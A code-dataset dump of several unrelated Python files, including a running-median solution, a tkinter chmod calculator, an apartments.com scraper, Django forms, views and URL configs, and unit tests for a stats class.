url = 'https://api.blockcypher.com/v1/btc/main/addrs/'+pk+'/balance'
data = requests.get(url, timeout=10).json()
b = float(data['balance']) / 100000000
bal += b
if float(data['total_received']) == 0:
break
return {'BTC':bal}
def derive_key(xpub, change, index, address='nested'):
path = './'+str(change)+'/'+str(index)
hash = xpub.derive(path).key.hash()
if address == 'nested':
return str(P2shAddress.from_script(P2wpkhAddress(hash, version=0).to_script()))
raise NotImplementedError("Only 'nested' xpub addresses are supported")
def address_is_used(addr):
url = 'https://blockchain.info/q/getreceivedbyaddress/' + addr
return float(requests.get(url,timeout=10).text) != 0
| StarcoderdataPython |
3207136 | #!/bin/python3
import os
import sys
import heapq
def addNum(num, lowers, highers):
if not lowers or num < -lowers[0]:
heapq.heappush(lowers,-num)
else:
heapq.heappush(highers,num)
def rebalance(lowers, highers):
if len(lowers) - len(highers) >= 2:
heapq.heappush(highers,-heapq.heappop(lowers))
elif len(highers) - len(lowers) >= 2:
heapq.heappush(lowers,-heapq.heappop(highers))
def getMedian(lowers, highers):
if len(lowers) == len(highers):
return (-lowers[0] + highers[0])/2
if len(lowers) > len(highers):
return float(-lowers[0])
else:
return float(highers[0])
#
# Complete the runningMedian function below.
#
def runningMedian(a):
maxHeap = [] # max heap, vals should go in and come out negated
minHeap = [] # min heap, vals should go in positive
result = []
for v in a:
addNum(v, maxHeap, minHeap)
rebalance(maxHeap, minHeap)
result.append(round(getMedian(maxHeap, minHeap),1))
return result
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
a_count = int(input())
a = []
for _ in range(a_count):
a_item = int(input())
a.append(a_item)
result = runningMedian(a)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
| StarcoderdataPython |
1635085 | <reponame>lazypwny751/ChmodCalculator
import tkinter as tk
import os
from modules import *
if os.name == "nt":
os.system("cls")
elif os.name == "posix":
os.system("clear")
banner = Beyaz+"""
██╗ ██████╗ ██████╗ ███████╗
██║ ██╔═══██╗██╔════╝ ██╔════╝
██║ ██║ ██║██║ ███╗███████╗
██║ ██║ ██║██║ ██║╚════██║
███████╗╚██████╔╝╚██████╔╝███████║
╚══════╝ ╚═════╝ ╚═════╝ ╚══════╝
"""
print(banner)
window = tk.Tk()
#Head
window.title("Chmod Calculator")
window.geometry("500x250")
window.resizable(False,False)
window.iconbitmap(r"simge.ico")
#Body
#Owners
owner1 = tk.IntVar()
owner2 = tk.IntVar()
owner3 = tk.IntVar()
owner1.set(0)
owner2.set(0)
owner3.set(0)
#Groups
group1 = tk.IntVar()
group2 = tk.IntVar()
group3 = tk.IntVar()
group1.set(0)
group2.set(0)
group3.set(0)
#Others
other1 = tk.IntVar()
other2 = tk.IntVar()
other3 = tk.IntVar()
other1.set(0)
other2.set(0)
other3.set(0)
#function
value=0
def chx():
value=0
if owner1.get() == 0:
pass
else:
value+=400
if owner2.get() == 0:
pass
else:
value+=200
if owner3.get() == 0:
pass
else:
value+=100
if group1.get() == 0:
pass
else:
value+=40
if group2.get() == 0:
pass
else:
value+=20
if group3.get() == 0:
value+0
else:
value+=10
if other1.get() == 0:
pass
else:
value+=4
if other2.get() == 0:
pass
else:
value+=2
if other3.get() == 0:
pass
else:
value+=1
if os.name == "nt":
os.system("cls")
elif os.name == "posix":
os.system("clear")
print(value)
#Owner
label = tk.Label(window, text="Owner", font="20")
label.pack(side=tk.LEFT)
label.place(x=50,y=0)
checkbox4 = tk.Checkbutton(window, text="Read", font="15", variable=owner1, command=chx)
checkbox4.pack()
checkbox4.place(x=50, y=35)
checkbox5 = tk.Checkbutton(window, text="Write", font="15", variable=owner2, command=chx)
checkbox5.pack()
checkbox5.place(x=50, y=75)
checkbox6 = tk.Checkbutton(window, text="Execute", font="15", variable=owner3, command=chx)
checkbox6.pack()
checkbox6.place(x=50, y=105)
#Group
label2 = tk.Label(window, text="Group", font="20")
label2.pack()
result = tk.Label(window, text="Our answer will appear in Terminal", font="20")
result.pack()
result.place(x=125, y=175)
checkbox1 = tk.Checkbutton(window, text="Read", font="15", variable=group1, command=chx)
checkbox1.pack()
checkbox1.place(x=210, y=35)
checkbox2 = tk.Checkbutton(window, text="Write", font="15", variable=group2, command=chx)
checkbox2.pack()
checkbox2.place(x=210, y=70)
checkbox3 = tk.Checkbutton(window, text="Execute", font="15", variable=group3, command=chx)
checkbox3.pack()
checkbox3.place(x=210, y=105)
#Other
label3 = tk.Label(window, text="Other", font="20")
label3.pack(side=tk.RIGHT)
label3.place(x=400, y=0)
checkbox7 = tk.Checkbutton(window, text="Read", font="15", variable=other1, command=chx)
checkbox7.pack()
checkbox7.place(x=400, y=35)
checkbox8 = tk.Checkbutton(window, text="Write", font="15", variable=other2, command=chx)
checkbox8.pack()
checkbox8.place(x=400, y=70)
checkbox9 = tk.Checkbutton(window, text="Execute", font="15", variable=other3, command=chx)
checkbox9.pack()
checkbox9.place(x=400, y=105)
window.mainloop()
| StarcoderdataPython |
3256949 | <reponame>mgiangreco/apartments-scraper
import boto3
import csv
import datetime
import json
import re
import sys
import datetime
import requests
import os
from bs4 import BeautifulSoup
# Config parser was renamed in Python 3
try:
import configparser
except ImportError:
import ConfigParser as configparser
def create_csv(search_urls, fname):
"""Create a CSV file with information that can be imported into ideal-engine"""
# avoid the issue on Windows where there's an extra space every other line
if sys.version_info[0] == 2: # Not named on 2.6
access = 'wb'
kwargs = {}
else:
access = 'wt'
kwargs = {'newline': ''}
# open file for writing
csv_file = open(fname, access, **kwargs)
# write to CSV
try:
writer = csv.writer(csv_file)
# this is the header (make sure it matches with the fields in
# write_parsed_to_csv)
header = ['Option Name', 'Contact', 'Address', 'Size',
'Rent', 'Monthly Fees', 'One Time Fees',
'Pet Policy',
'Parking', 'Gym', 'Kitchen',
'Amenities', 'Features', 'Living Space',
'Lease Info', 'Services',
'Property Info', 'Indoor Info', 'Outdoor Info',
'Images', 'Description', 'ds']
# write the header
writer.writerow(header)
# parse current entire apartment list including pagination for all search urls
for url in search_urls:
print ("Now getting apartments from: %s" % url)
write_parsed_to_csv(url, writer)
finally:
csv_file.close()
def write_parsed_to_csv(page_url, writer):
"""Given the current page URL, extract the information from each apartment in the list"""
# read the current page
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}
page = requests.get(page_url, headers=headers)
# soupify the current page
soup = BeautifulSoup(page.content, 'html.parser')
soup.prettify()
# only look in this region
soup = soup.find('div', class_='placardContainer')
# append the current apartments to the list
for item in soup.find_all('article', class_='placard'):
url = ''
rent = ''
contact = ''
if item.find('a', class_='placardTitle') is None: continue
url = item.find('a', class_='placardTitle').get('href')
# get the rent and parse it to unicode
obj = item.find('span', class_='altRentDisplay')
if obj is not None:
rent = obj.getText().strip()
# get the phone number and parse it to unicode
obj = item.find('div', class_='phone')
if obj is not None:
contact = obj.getText().strip()
# get the other fields to write to the CSV
fields = parse_apartment_information(url)
# make this wiki markup
fields['name'] = '[' + str(fields['name']) + '](' + url + ')'
fields['address'] = '[' + fields['address'] + '](' + ')'
# get the datetime
fields['ds'] = str(datetime.datetime.utcnow().date())
# fill out the CSV file
row = [fields['name'], contact,
fields['address'], fields['size'],
rent, fields['monthFees'], fields['onceFees'],
fields['petPolicy'],
fields['parking'], fields['gym'], fields['kitchen'],
fields['amenities'], fields['features'], fields['space'],
fields['lease'], fields['services'],
fields['info'], fields['indoor'], fields['outdoor'],
fields['img'], fields['description'], fields['ds']]
# write the row
writer.writerow(row)
# get the next page URL for pagination
next_url = soup.find('a', class_='next')
# if there's only one page this will actually be none
if next_url is None:
return
# get the actual next URL address
next_url = next_url.get('href')
if next_url is None or next_url == '' or next_url == 'javascript:void(0)':
return
# recurse until the last page
write_parsed_to_csv(next_url, writer)
def parse_apartment_information(url):
"""For every apartment page, populate the required fields to be written to CSV"""
# read the current page
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}
page = requests.get(url, headers=headers)
# soupify the current page
soup = BeautifulSoup(page.content, 'html.parser')
soup.prettify()
# the information we need to return as a dict
fields = {}
# get the name of the property
get_property_name(soup, fields)
# get the address of the property
get_property_address(soup, fields)
# get the size of the property
get_property_size(soup, fields)
# get the one time and monthly fees
get_fees(soup, fields)
# get the images as a list
get_images(soup, fields)
# get the description section
get_description(soup, fields)
# only look in this section (other sections are for example for printing)
soup = soup.find('section', class_='specGroup js-specGroup')
# get the pet policy of the property
get_pet_policy(soup, fields)
# get parking information
get_parking_info(soup, fields)
# get the amenities description
get_field_based_on_class(soup, 'amenities', 'featuresIcon', fields)
# get the 'interior information'
get_field_based_on_class(soup, 'indoor', 'interiorIcon', fields)
# get the 'outdoor information'
get_field_based_on_class(soup, 'outdoor', 'parksIcon', fields)
# get the 'gym information'
get_field_based_on_class(soup, 'gym', 'fitnessIcon', fields)
# get the 'kitchen information'
get_field_based_on_class(soup, 'kitchen', 'kitchenIcon', fields)
# get the 'services information'
get_field_based_on_class(soup, 'services', 'servicesIcon', fields)
# get the 'living space information'
get_field_based_on_class(soup, 'space', 'sofaIcon', fields)
# get the lease length
get_field_based_on_class(soup, 'lease', 'leaseIcon', fields)
# get the 'property information'
get_features_and_info(soup, fields)
return fields
def prettify_text(data):
"""Given a string, replace unicode chars and make it prettier"""
# format it nicely: replace multiple spaces with just one
data = re.sub(' +', ' ', data)
# format it nicely: replace multiple new lines with just one
data = re.sub('(\r?\n *)+', '\n', data)
# format it nicely: replace bullet with *
data = re.sub(u'\u2022', '* ', data)
# format it nicely: replace registered symbol with (R)
data = re.sub(u'\xae', ' (R) ', data)
# format it nicely: remove trailing spaces
data = data.strip()
# format it nicely: encode it, removing special symbols
data = data.encode('utf8', 'ignore')
return str(data).encode('utf-8')
def get_images(soup, fields):
"""Get the images of the apartment"""
fields['img'] = ''
if soup is None: return
# find ul with id fullCarouselCollection
soup = soup.find('ul', {'id': 'fullCarouselCollection'})
if soup is not None:
for img in soup.find_all('img'):
fields['img'] += '![' + img['alt'] + '](' + img['src'] + ') '
def get_description(soup, fields):
"""Get the description for the apartment"""
fields['description'] = ''
if soup is None: return
# find p with itemprop description
obj = soup.find('p', {'itemprop': 'description'})
if obj is not None:
fields['description'] = prettify_text(obj.getText())
def get_property_size(soup, fields):
"""Given a beautifulSoup parsed page, extract the property size of the first one bedroom"""
#note: this might be wrong if there are multiple matches!!!
fields['size'] = ''
if soup is None: return
obj = soup.find('tr', {'data-beds': '1'})
if obj is not None:
data = obj.find('td', class_='sqft').getText()
data = prettify_text(data)
fields['size'] = data
def get_features_and_info(soup, fields):
"""Given a beautifulSoup parsed page, extract the features and property information"""
fields['features'] = ''
fields['info'] = ''
if soup is None: return
obj = soup.find('i', class_='propertyIcon')
if obj is not None:
for obj in soup.find_all('i', class_='propertyIcon'):
data = obj.parent.findNext('ul').getText()
data = prettify_text(data)
if obj.parent.findNext('h3').getText().strip() == 'Features':
# format it nicely: remove trailing spaces
fields['features'] = data
if obj.parent.findNext('h3').getText() == 'Property Information':
# format it nicely: remove trailing spaces
fields['info'] = data
def get_field_based_on_class(soup, field, icon, fields):
"""Given a beautifulSoup parsed page, extract the specified field based on the icon"""
fields[field] = ''
if soup is None: return
obj = soup.find('i', class_=icon)
if obj is not None:
data = obj.parent.findNext('ul').getText()
data = prettify_text(data)
fields[field] = data
def get_parking_info(soup, fields):
"""Given a beautifulSoup parsed page, extract the parking details"""
fields['parking'] = ''
if soup is None: return
obj = soup.find('div', class_='parkingDetails')
if obj is not None:
data = obj.getText()
data = prettify_text(data)
# format it nicely: remove trailing spaces
fields['parking'] = data
def get_pet_policy(soup, fields):
"""Given a beautifulSoup parsed page, extract the pet policy details"""
if soup is None:
fields['petPolicy'] = ''
return
# the pet policy
data = soup.find('div', class_='petPolicyDetails')
if data is None:
data = ''
else:
data = data.getText()
data = prettify_text(data)
# format it nicely: remove the trailing whitespace
fields['petPolicy'] = data
def get_fees(soup, fields):
"""Given a beautifulSoup parsed page, extract the one time and monthly fees"""
fields['monthFees'] = ''
fields['onceFees'] = ''
if soup is None: return
obj = soup.find('div', class_='monthlyFees')
if obj is not None:
for expense in obj.find_all('div', class_='fee'):
description = expense.find(
'div', class_='descriptionWrapper').getText()
description = prettify_text(description)
price = expense.find('div', class_='priceWrapper').getText()
price = prettify_text(price)
fields['monthFees'] += '* ' + description + ': ' + price + '\n'
# get one time fees
obj = soup.find('div', class_='oneTimeFees')
if obj is not None:
for expense in obj.find_all('div', class_='fee'):
description = expense.find(
'div', class_='descriptionWrapper').getText()
description = prettify_text(description)
price = expense.find('div', class_='priceWrapper').getText()
price = prettify_text(price)
fields['onceFees'] += '* ' + description + ': ' + price + '\n'
# remove ending \n
fields['monthFees'] = fields['monthFees'].strip()
fields['onceFees'] = fields['onceFees'].strip()
def average_field(obj1, obj2, field):
"""Take the average given two objects that have field values followed by (same) unit"""
val1 = float(prettify_text(obj1[field]).split()[0])
val2 = float(prettify_text(obj2[field]).split()[0])
unit = ' ' + prettify_text(obj1[field]).split()[1]
avg = 0.5 * (val1 + val2)
if field == 'duration':
avg = int(avg)
return str(avg) + unit
def get_property_name(soup, fields):
"""Given a beautifulSoup parsed page, extract the name of the property"""
fields['name'] = ''
# get the name of the property
obj = soup.find('h1', class_='propertyName')
if obj is not None:
name = obj.getText()
name = prettify_text(name)
fields['name'] = name
def find_addr(script, tag):
"""Given a script and a tag, use python find to find the text after tag"""
tag = tag + ": \'"
start = script.find(tag)+len(tag)
end = script.find("\',", start)
return script[start : end]
def get_property_address(soup, fields):
"""Given a beautifulSoup parsed page, extract the full address of the property"""
address = ""
# They changed how this works so I need to grab the script
script = soup.findAll('script', type='text/javascript')[2].text
# The address is everything in quotes after listingAddress
address = find_addr(script, "listingAddress")
# City
address += ", " + find_addr(script, "listingCity")
# State
address += ", " + find_addr(script, "listingState")
# Zip Code
address += " " + find_addr(script, "listingZip")
fields['address'] = address
def parse_config_times(given_time):
"""Convert the tomorrow at given_time New York time to seconds since epoch"""
# tomorrow's date
tomorrow = datetime.date.today() + datetime.timedelta(days=1)
# tomorrow's date/time string based on time given
date_string = str(tomorrow) + ' ' + given_time
# tomorrow's datetime object
format_ = '%Y-%m-%d %I:%M %p'
date_time = datetime.datetime.strptime(date_string, format_)
# the epoch
epoch = datetime.datetime.utcfromtimestamp(0)
# return time since epoch in seconds, string without decimals
time_since_epoch = (date_time - epoch).total_seconds()
return str(int(time_since_epoch))
def save_file_to_s3(bucket, fname):
s3 = boto3.resource('s3')
data = open(fname, 'rb')
s3.Bucket(bucket).put_object(Key=fname, Body=data)
def main():
"""Read from the config file"""
conf = configparser.ConfigParser()
config_file = os.path.join(os.path.dirname(__file__), "config.ini")
conf.read(config_file)
# get the apartments.com search URL(s)
apartments_url_config = conf.get('all', 'apartmentsURL')
urls = apartments_url_config.replace(" ", "").split(",")
# get the name of the output file
fname = conf.get('all', 'fname') + '.csv'
create_csv(urls, fname)
save_file_to_s3('mg-apartments', fname)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1754735 | <filename>devdb/forms.py
from django import forms
from models import DeveloperRegistration
from datetime import datetime
import logging
import md5
class DeveloperRegistrationForm(forms.Form):
contact_name = forms.CharField(initial='<NAME>')
website_url = forms.URLField(label='Your website')
email = forms.EmailField(max_length=255)
tool_id = forms.CharField(max_length=40)
def clean_tool_id(self):
tool_id = self.cleaned_data['tool_id']
q = DeveloperRegistration.all().filter("tool_id =", tool_id)
if q.get():
raise forms.ValidationError("A tool with this name has already been registered!")
return tool_id
def save(self):
tool_id = self.cleaned_data['tool_id']
reg = DeveloperRegistration(
key_name = md5.new(str(tool_id)).hexdigest(),
contact_name = self.cleaned_data['contact_name'],
website_url = self.cleaned_data['website_url'],
email = self.cleaned_data['email'],
tool_id = tool_id,
created_on = datetime.now()
)
reg.put()
return reg
| StarcoderdataPython |
3395958 | from django.shortcuts import render
import requests
import json
import pandas as pd
# Create your views here.
def parseapi(request):
api= requests.get('https://s3.amazonaws.com/open-to-cors/assignment.json')
print(api.status_code)
data = api.text
# storing the JSON response from url in data
parse_json = json.loads(data)
# count = parse_json['count']
# print(count)
products = parse_json['products']
# print(products)
# print(type(products))
data=[]
for key in products:
x=products[key]
data.append(x)
# print(data)
df = pd.DataFrame.from_dict(data)
df.sort_values(by=['popularity'])
context=[]
for index, row in df.iterrows():
x=row['subcategory']
y=row['title']
z=row['price']
za=row['popularity']
con={'x':x,'y':y,'z':z,'za':za}
context.append(con)
print(context)
print(type(context))
return render(request, 'parseapi/parseapi.html',{'context':context})
# def index(request):
# context= {}#request.POST.get('context')
# return render(request,"account/index.html",context)
| StarcoderdataPython |
102684 | from .assigners import BaseAssigner, HungarianAssigner
from .builder import build_sampler, build_assigner
from .samplers import BaseSampler, PseudoSampler, SamplingResult
from .transforms import hoi2result
__all__ = [
'BaseAssigner', 'HungarianAssigner', 'build_assigner', 'build_sampler',
'BaseSampler', 'PseudoSampler', 'SamplingResult', 'hoi2result'
]
| StarcoderdataPython |
90674 | <filename>test_stats.py
from copy import copy, deepcopy
import os
import time
import unittest
from characteristics_damages import *
from stats import Stats
class TestStats(unittest.TestCase):
def test_create_empty(self):
empty_characteristics = [0 for _ in range(CHARACTERISTICS_COUNT)]
empty_damages = [0 for _ in range(DAMAGES_COUNT)]
stats = Stats()
self.assertListEqual(stats.characteristics, empty_characteristics)
self.assertListEqual(stats.damages, empty_damages)
def test_create_from_invalid_json(self):
invalid_json_string = '{'
with self.assertRaises(ValueError):
Stats.from_json_string(invalid_json_string)
def test_create_from_incomplete_json(self):
json_missing_all_fields = '{}'
json_missing_characteristics_field = '{"name": "name", "damages": {}}'
json_missing_damages_field = '{"short_name": "sn", "bonus_crit_chance": 0, "name": "name", "characteristics": {}}'
json_missing_bonus_crit_chance_field = '{"short_name": "sn", "name": "name", "damages": {}, "characteristics": {}}'
json_missing_name_field = '{"short_name": "sn", "bonus_crit_chance": 0, "damages": {}, "characteristics": {}}'
json_missing_short_name_field = '{"name": "name", "bonus_crit_chance": 0, "damages": {}, "characteristics": {}}'
json_missing_characteristics = '{"bonus_crit_chance": 0, "damages": {}, "characteristics": {}, "name": ""}'
# Double { and } because of .format
json_missing_damages = '{{"short_name": "sn", "bonus_crit_chance": 0, "name": "name", "damages": {{}}, "characteristics": {0}}}'.format([0 for _ in range(CHARACTERISTICS_COUNT)]).replace("'", '"')
with self.assertRaises(KeyError):
Stats.from_json_string(json_missing_all_fields)
Stats.from_json_string(json_missing_characteristics_field)
Stats.from_json_string(json_missing_bonus_crit_chance_field)
Stats.from_json_string(json_missing_name_field)
Stats.from_json_string(json_missing_short_name_field)
Stats.from_json_string(json_missing_damages_field)
Stats.from_json_string(json_missing_characteristics)
Stats.from_json_string(json_missing_damages)
def test_create_from_valid_json(self):
valid_json_string = '{{"short_name": "sn", "bonus_crit_chance": 0, "name": "name", "damages": {0}, "characteristics": {1}}}'.format(
[0 for _ in range(DAMAGES_COUNT)],
[0 for _ in range(CHARACTERISTICS_COUNT)]
).replace("'", '"')
Stats.from_json_string(valid_json_string)
def test_different_neutral_strength(self):
json_string = '{{"short_name": "sn", "bonus_crit_chance": 0, "name": "", "damages": {0}, "characteristics": {1}}}'.format(
[0 for _ in range(DAMAGES_COUNT)],
[100 * (characteristic == NEUTRAL) for characteristic in range(CHARACTERISTICS_COUNT)]
).replace("'", '"')
with self.assertRaises(ValueError):
Stats.from_json_string(json_string)
def test_create_from_file(self):
filepath = 'test_files\\test_stats.json'
# Check if the file still exists and is accessible
assert os.path.isfile(filepath) and os.access(filepath, os.R_OK)
stats = Stats.from_file(filepath)
self.assertEqual(stats.get_name(), 'test stats')
def test_get_characteristic(self):
stats = Stats()
self.assertEqual(stats.get_characteristic(STRENGTH), 0)
with self.assertRaises(TypeError):
stats.get_characteristic("string")
def test_set_characteristic(self):
stats = Stats()
stats.set_characteristic(INTELLIGENCE, 100)
self.assertEqual(stats.get_characteristic(INTELLIGENCE), 100)
with self.assertRaises(TypeError):
stats.set_characteristic("string", 0)
stats.set_characteristic(LUCK, "string")
def test_neutral_strength_equality(self):
stats = Stats()
stats.set_characteristic(STRENGTH, 150)
self.assertEqual(stats.get_characteristic(NEUTRAL), 150)
with self.assertRaises(TypeError):
stats.set_characteristic(NEUTRAL, 100)
def test_set_bonus_crit_chance(self):
stats = Stats()
stats.set_bonus_crit_chance(0.56)
self.assertEqual(stats.get_bonus_crit_chance(), 0.56)
stats.set_bonus_crit_chance(1)
self.assertEqual(stats.get_bonus_crit_chance(), 1.0)
with self.assertRaises(TypeError):
stats.set_bonus_crit_chance("string")
with self.assertRaises(ValueError):
stats.set_bonus_crit_chance(1.5)
def test_set_name(self):
stats = Stats()
stats.set_name("name")
self.assertEqual(stats.get_name(), "name")
stats.set_name(42)
self.assertEqual(stats.get_name(), "42")
def test_set_short_name(self):
stats = Stats()
stats.set_short_name("name")
self.assertEqual(stats.get_short_name(), "name")
stats.set_short_name(42)
self.assertEqual(stats.get_short_name(), "42")
def test_valid_simple_addition(self):
stats1 = Stats()
stats1.set_characteristic(INTELLIGENCE, 100)
stats1.set_damage(BASIC, 20)
stats1.set_bonus_crit_chance(0.3)
stats1.set_name("stats1")
stats2 = Stats()
stats2.set_characteristic(INTELLIGENCE, 80)
stats2.set_damage(BASIC, 15)
stats2.set_bonus_crit_chance(0.5)
stats2.set_name("stats2")
stats3 = stats1 + stats2
self.assertEqual(stats3.get_characteristic(INTELLIGENCE), 100 + 80)
self.assertEqual(stats3.get_damage(BASIC), 20 + 15)
self.assertAlmostEqual(stats3.get_bonus_crit_chance(), 0.3 + 0.5)
self.assertEqual(stats3.get_name(), "stats1")
def test_valid_sum(self):
stats1 = Stats()
stats1.set_characteristic(AGILITY, 40)
stats1.set_name('stats1')
stats2 = Stats()
stats2.set_characteristic(AGILITY, 50)
stats3 = sum([stats1, stats2])
self.assertEqual(stats3.get_characteristic(AGILITY), 40 + 50)
def test_invalid_sum(self):
stats1 = Stats()
with self.assertRaises(TypeError):
stats2 = stats1 + 1
stats2 = stats1 + "string"
def test_performance_deep_copy(self):
stats = Stats()
stats.set_characteristic(AGILITY, 779)
stats.set_characteristic(LUCK, 86)
stats.set_characteristic(STRENGTH, 101)
stats.set_characteristic(INTELLIGENCE, 81)
stats.set_damage(POWER, 121)
stats.set_damage(BASIC, 17)
stats.set_damage(NEUTRAL, 29)
stats.set_damage(EARTH, 31)
stats.set_damage(FIRE, 7)
stats.set_damage(WATER, 7)
stats.set_damage(AIR, 49)
stats.set_damage(SPELL, 7)
N = 10000
t0 = time.perf_counter_ns()
for _ in range(N):
stats_copied = Stats.from_existing(stats)
t1 = time.perf_counter_ns()
print(f"\n{N} repetitions : {1e-6 * (t1 - t0):.1f} ms total ({1e-3 * (t1 - t0) / N:.1f} µs / copy)")
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1780142 | from __future__ import unicode_literals
from youtube_dlc.extractor.common import InfoExtractor
class SamplePluginIE(InfoExtractor):
_WORKING = False
IE_DESC = False
_VALID_URL = r'^sampleplugin:'
def _real_extract(self, url):
self.to_screen('URL "%s" sucessfully captured' % url)
| StarcoderdataPython |
3303820 | <filename>threads/kmeans_test.py
def main():
## Initialisation
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
df=pd.read_csv('sampledata.csv')
#print(df1)
a=df.iloc[0]
b=df.iloc[1]
c=df.iloc[2]
d=df.iloc[3]
e=df.iloc[4]
f=df.iloc[5]
g=df.iloc[6]
h=df.iloc[7]
i=df.iloc[8]
l1=list(a[2:])
l2=list(b[2:])
l3=list(c[2:])
l4=list(d[2:])
l5=list(e[2:])
l6=list(f[2:])
l7=list(g[2:])
l8=list(h[2:])
l=list(i[2:])
#dict={l1:df.iloc[0][0:1],l2:df.iloc[1][0:1],l3:df.iloc[2][0:1],l4:df.iloc[3][0:1],l5:df.iloc[4][0:1],l6:df.iloc[5][0:1],l7:df.iloc[6][0:1],l8:df.iloc[7][0:1]}
def diff(x,xp):
return math.sqrt((x-xp)**2)
def values(l,test):
a=[]
for i in range(0,len(l)):
a.append(diff(l[i],test[i]))
return a
ideal=[250,90,7.7,95,2,1.5]
t1=values(l1,ideal)
t2=values(l2,ideal)
t3=values(l3,ideal)
t4=values(l4,ideal)
t5=values(l5,ideal)
t6=values(l6,ideal)
t7=values(l7,ideal)
t8=values(l8,ideal)
#print(t1,t2,t3,t4,t5,t6,t7,t8)
'''def result(t,o):
if (t[0]!=10.0 and t[1]!=10.0 and t[2]!=0.0 and t[3]!=0.0 and t[4]!=11.0 and t[5]!=0.5):
print("extreme conditions, coordinates are")
print(o[0:2].to_string())
print("\n")
else:
print("normal conditions\n")'''
def result(t,o):
if (t[0]!=10.0 and t[1]!=10.0 and t[2]!=0.0 and t[3]!=0.0 and t[4]!=11.0 and t[5]!=0.5):
return("extreme conditions, coordinates are", o[0:2].to_string())
else:
return("normal conditions ")
d1=result(t1,a)
d2=result(t2,b)
d3=result(t3,c)
d4=result(t4,d)
#print(a[0:2].to_string())
dat=open("data.txt",'w')
dat.write(str(d1))
dat.write(str(d2))
dat.write(str(d3))
dat.write(str(d4))
| StarcoderdataPython |
3243350 | <gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', # noqa
TemplateView.as_view(template_name='base.html'),
name="home"),
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name="about"),
url(r'^animals/', include('animals.urls')),
url(r'^groups/', include('groups.urls')),
url(r'^finances/', include('finances.urls')),
url(r'^records/', include('records.urls')),
url(r'^health/', include('health.urls')),
url(r'^users/', include('smartmin.users.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# User management
url(r'^users/', include("users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
# Uncomment the next line to enable avatars
url(r'^avatar/', include('avatar.urls')),
# RapidSMS core URLs
(r'^accounts/', include('rapidsms.urls.login_logout')),
url(r'^$', 'rapidsms.views.dashboard', name='rapidsms-dashboard'),
# RapidSMS contrib app URLs
(r'^httptester/', include('rapidsms.contrib.httptester.urls')),
#(r'^locations/', include('rapidsms.contrib.locations.urls')),
(r'^messagelog/', include('rapidsms.contrib.messagelog.urls')),
(r'^messaging/', include('rapidsms.contrib.messaging.urls')),
(r'^registration/', include('rapidsms.contrib.registration.urls')),
# Third party URLs
(r'^selectable/', include('selectable.urls')),
(r'^select2/', include('django_select2.urls')),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.